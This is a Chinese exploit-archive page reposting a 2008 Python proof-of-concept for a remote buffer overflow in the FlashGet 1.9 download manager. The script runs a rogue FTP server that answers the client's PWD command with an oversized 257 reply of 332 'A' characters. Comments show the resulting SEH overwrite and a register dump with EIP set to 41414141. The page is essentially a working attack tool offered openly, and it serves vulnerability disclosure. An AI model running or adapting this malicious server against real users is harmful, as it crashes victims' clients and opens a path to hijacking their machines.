首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 >FlashGet 1.9 (FTP PWD Response) Remote BOF Exploit PoC 0day 来源：h07@interia.pl 作者：h07 发布时间：2008-08-14   #!/usr/bin/python # FlashGet 1.9 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Testen on: FlashGet 1.9 / XP SP2 Polish # Product URL: http://www.flashget.com/en/download.htm?uid=undefined # Details:.. # # 257 "[AAAA..332]/" is current directory.\r\n <-- overflow # # 41414141  Pointer to next SEH record # 41414141  SE handler # # ---------------------------------------------------------------- # Exception C0000005 (ACCESS_VIOLATION reading [41414141]) # ---------------------------------------------------------------- # EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 # ESP=020D1260: BF 37 90 7C 48 13 0D 02-08 FF 1C 02 64 13 0D 02 # EBP=020D1280: 30 13 0D 02 8B 37 90 7C-48 13 0D 02 08 FF 1C 02 # ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? #               --> N/A # ---------------------------------------------------------------- # Just for fun ;] ## from time import sleep from socket import * res = [     '220 WELCOME!! :x\r\n',     '331 Password required for %s.\r\n',     '230 User %s logged in.\r\n',     '250 CWD command successful.\r\n',     '257 "%s/" is current directory.\r\n' # <-- %s B0f :x     ] buf = 'A' * 332 s = socket(AF_INET, SOCK_STREAM) s.bind(('0.0.0.0', 21)) s.listen(1) print '[+] listening on [FTP] 21 ...\n' c, addr = s.accept() c.send(res[0]) user = '' for i in range(1, len(res)):     req = c.recv(1024)     print '[*][CLIENT] %s' % (req)     tmp = res[i]     if(req.find('USER') != -1):         req = req.replace('\r\n', '')         user = req.split('\x20', 1)[1]         tmp %= user     if(req.find('PASS') != -1):         tmp %= user     if(req.find('PWD') != -1):         tmp %= buf        print '[*][SERVER] %s' % (tmp)        c.send(tmp) sleep(5) c.close() s.close() print '[+] DONE' # EoF   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·IntelliTamper 2.07/2.08 Beta 4 ·Microsoft Visual Studio (Msmas ·ESET Smart Security 3.0.667.0 ·IntelliTamper 2.07 HTTP Header ·EO Video 1.36 Local Heap Overf ·Quicksilver Forums 1.4.1 forum ·FlashGet 1.9.0.1012 (FTP PWD R ·Cisco WebEx Meeting Manager (a ·WS_FTP Home/Professional FTP C ·Sun xVM VirtualBox < 1.6.4 Pri ·VMware Workstation (hcmon.sys ·BlazeDVD 5.0 PLF Playlist File   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved